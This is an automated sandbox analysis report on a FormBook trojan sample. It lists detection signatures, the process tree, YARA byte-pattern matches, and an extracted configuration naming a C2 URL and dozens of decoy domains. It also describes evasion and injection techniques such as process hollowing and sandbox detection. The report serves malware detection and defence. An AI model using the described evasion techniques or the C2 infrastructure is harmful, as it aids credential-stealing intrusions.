Play interactive tour

Edit tour

Windows Analysis Report 9thuIDnsFV

Overview

General Information

Sample Name:	9thuIDnsFV (renamed file extension from none to exe)
Analysis ID:	452499
MD5:	0e715db2198ff670f4bf0e88e0e9b547
SHA1:	2de5030a9261655e5879e4faba7b5e79d1dd483e
SHA256:	4dc8cb12314311a3bf1b1afa5cc5483284fda573f18c15ab0fef18b7b9ef9f98
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

9thuIDnsFV.exe (PID: 6324 cmdline: 'C:\Users\user\Desktop\9thuIDnsFV.exe' MD5: 0E715DB2198FF670F4BF0E88E0E9B547)

9thuIDnsFV.exe (PID: 5860 cmdline: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)

explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 4868 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 3520 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa238:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa4b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x32258:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x324d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15fd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3dff5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15ac1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3dae1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x160d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3e0f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1624f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3e26f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaeca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x32eea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14d3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x3cd5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbbc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x33be3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bc77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x43c97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cc7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18d59:$sqlite3step: 68 34 1C 7B E1 0x18e6c:$sqlite3step: 68 34 1C 7B E1 0x40d79:$sqlite3step: 68 34 1C 7B E1 0x40e8c:$sqlite3step: 68 34 1C 7B E1 0x18d88:$sqlite3text: 68 38 2A 90 C5 0x18ead:$sqlite3text: 68 38 2A 90 C5 0x40da8:$sqlite3text: 68 38 2A 90 C5 0x40ecd:$sqlite3text: 68 38 2A 90 C5 0x18d9b:$sqlite3blob: 68 53 D8 7F 8C 0x18ec3:$sqlite3blob: 68 53 D8 7F 8C 0x40dbb:$sqlite3blob: 68 53 D8 7F 8C 0x40ee3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa278:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa4f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x28b2a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x28b522:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16015:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x297045:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x296b31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16117:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x297147:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1628f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2972bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaf0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x28bf3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14d7c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x295dac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbc03:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x28cc33:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bcb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x29cce7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ccba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18d99:$sqlite3step: 68 34 1C 7B E1 0x18eac:$sqlite3step: 68 34 1C 7B E1 0x299dc9:$sqlite3step: 68 34 1C 7B E1 0x299edc:$sqlite3step: 68 34 1C 7B E1 0x18dc8:$sqlite3text: 68 38 2A 90 C5 0x18eed:$sqlite3text: 68 38 2A 90 C5 0x299df8:$sqlite3text: 68 38 2A 90 C5 0x299f1d:$sqlite3text: 68 38 2A 90 C5 0x18ddb:$sqlite3blob: 68 53 D8 7F 8C 0x18f03:$sqlite3blob: 68 53 D8 7F 8C 0x299e0b:$sqlite3blob: 68 53 D8 7F 8C 0x299f33:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.9thuIDnsFV.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.9thuIDnsFV.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.9thuIDnsFV.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9bf58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9c1d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7cf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xa77e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa7df7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xa7f6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9cbea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xa6a5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9d8e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xad997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xae99a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xaaa79:$sqlite3step: 68 34 1C 7B E1 0xaab8c:$sqlite3step: 68 34 1C 7B E1 0xaaaa8:$sqlite3text: 68 38 2A 90 C5 0xaabcd:$sqlite3text: 68 38 2A 90 C5 0xaaabb:$sqlite3blob: 68 53 D8 7F 8C 0xaabe3:$sqlite3blob: 68 53 D8 7F 8C
10.2.9thuIDnsFV.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.9thuIDnsFV.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.9thuIDnsFV.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1381e0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13845a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x143f7d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a69:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14407f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1441f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x138e72:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x142ce4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x139b6b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x149c1f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14ac22:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x146d01:$sqlite3step: 68 34 1C 7B E1 0x146e14:$sqlite3step: 68 34 1C 7B E1 0x146d30:$sqlite3text: 68 38 2A 90 C5 0x146e55:$sqlite3text: 68 38 2A 90 C5 0x146d43:$sqlite3blob: 68 53 D8 7F 8C 0x146e6b:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Show sources

Source: 9thuIDnsFV.exe	Virustotal: Detection: 38%			Perma Link
Source: 9thuIDnsFV.exe	ReversingLabs: Detection: 23%

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY

Source: 10.2.9thuIDnsFV.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CFDA0 BasepCopyEncryption,	10_2_019CFDA0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B7D72 BasepCopyEncryption,	10_2_019B7D72
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D8E00 BasepCopyEncryption,	10_2_019D8E00
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2E3E BasepCopyEncryption,	10_2_019D2E3E
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B2250 BasepCopyEncryption,	10_2_019B2250

Source: 9thuIDnsFV.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 9thuIDnsFV.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 4x nop then pop esi	10_2_004172CB
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 4x nop then pop ebx	10_2_00407AFA
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 4x nop then pop edi	10_2_00417D5B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop ebx	20_2_02F17AFB
